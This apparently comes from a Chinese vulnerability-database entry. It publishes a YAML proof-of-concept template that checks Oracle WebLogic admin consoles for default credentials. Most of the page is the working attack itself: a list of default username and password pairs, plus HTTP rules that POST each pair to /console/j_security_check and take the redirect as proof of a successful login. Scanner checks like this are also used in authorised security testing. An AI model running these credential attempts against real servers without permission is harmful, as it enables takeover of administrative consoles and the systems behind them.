weblogic-weak-login: WebLogic Weak Login

日期: 2025-09-01 | 影响软件: WebLogic | POC: 已公开

漏洞描述

WebLogic default login credentials were discovered.

PoC代码[已公开]

id: weblogic-weak-login

info:
  name: WebLogic Weak Login
  author: shadown1ng(https://github.com/shadown1ng)
  description: WebLogic default login credentials were discovered.
  severity: high
  verified: true
  tags: weblogic,weak-login
  created: 2023/10/14

set:
    username: "weblogic"
    password-1: "weblogic"
    password-2: "weblogic1"
    password-3: "welcome1"
    password-4: "Oracle@123"
    password-5: "weblogic123"
    username-2: "admin"
    password-22: "12345678"
    password-23: "security"
    username-3: "system"
    password-33: "password"
rules:
    r00:
        request:
            method: HEAD
            path: /console/j_security_check
        expression: |
            response.status == 302  && response.headers['set-cookie'].contains("ADMINCONSOLESESSION")
        stop_if_mismatch: true
    r0:
        request:
            method: POST
            path: /console/j_security_check
            body: j_username={{username}}&j_password={{password-1}}&j_character_encoding=UTF-8
        expression: response.status == 302 && !response.headers["location"].icontains("LoginForm.jsp")
        stop_if_match: true
    r1:
        request:
            method: POST
            path: /console/j_security_check
            body: j_username={{username}}&j_password={{password-2}}&j_character_encoding=UTF-8
        expression: response.status == 302 && !response.headers["location"].icontains("LoginForm.jsp")
        stop_if_match: true
    r2:
        request:
            method: POST
            path: /console/j_security_check
            body: j_username={{username}}&j_password={{password-3}}&j_character_encoding=UTF-8
        expression: response.status == 302 && !response.headers["location"].icontains("LoginForm.jsp")
        stop_if_match: true
    r3:
        request:
            method: POST
            path: /console/j_security_check
            body: j_username={{username}}&j_password={{password-4}}&j_character_encoding=UTF-8
        expression: response.status == 302 && !response.headers["location"].icontains("LoginForm.jsp")
        stop_if_match: true
    r4:
        request:
            method: POST
            path: /console/j_security_check
            body: j_username={{username}}&j_password={{password-5}}&j_character_encoding=UTF-8
        expression: response.status == 302 && !response.headers["location"].icontains("LoginForm.jsp")
        stop_if_match: true
    r5:
        request:
            method: POST
            path: /console/j_security_check
            body: j_username={{username-2}}&j_password={{password-22}}&j_character_encoding=UTF-8
        expression: response.status == 302 && !response.headers["location"].icontains("LoginForm.jsp")
        stop_if_match: true
    r6:
        request:
            method: POST
            path: /console/j_security_check
            body: j_username={{username-2}}&j_password={{password-23}}&j_character_encoding=UTF-8
        expression: response.status == 302 && !response.headers["location"].icontains("LoginForm.jsp")
        stop_if_match: true
    r7:
        request:
            method: POST
            path: /console/j_security_check
            body: j_username={{username-3}}&j_password={{password-33}}&j_character_encoding=UTF-8
        expression: response.status == 302 && !response.headers["location"].icontains("LoginForm.jsp")
        stop_if_match: true
expression: r00() && (r0() || r1() || r2() || r3() || r4() || r5() || r6() || r7())

相关漏洞推荐